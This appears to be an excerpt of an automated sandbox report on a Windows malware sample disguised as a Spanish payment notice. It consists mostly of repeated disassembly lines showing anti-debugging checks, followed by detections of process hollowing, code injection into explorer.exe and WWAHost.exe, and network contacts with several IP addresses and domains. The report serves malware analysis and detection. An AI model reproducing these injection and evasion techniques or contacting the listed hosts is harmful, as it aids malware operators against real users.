          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03955210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03955210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03955210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03955210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03973A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03968A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03994A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03994A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039E4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039E41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03974120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03959080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03970050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03970050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A12073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A21074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03968794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03954F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03954F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03998EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03988E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03981DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03981DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03981DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A08DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03963D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03984D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039DA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03977D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03993D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0040A130 LdrLoadDll,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 104.195.7.239 80
          Source: C:\Windows\explorer.exeDomain query: www.theguiriguide.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80
          Source: C:\Windows\explorer.exeDomain query: www.librevillegabon.com
          Source: C:\Windows\explorer.exeDomain query: www.team-ctctitleco.com
          Source: C:\Windows\explorer.exeDomain query: www.evertribute.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 1120000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeMemory written: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeThread register set: target process: 3968
          Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3968
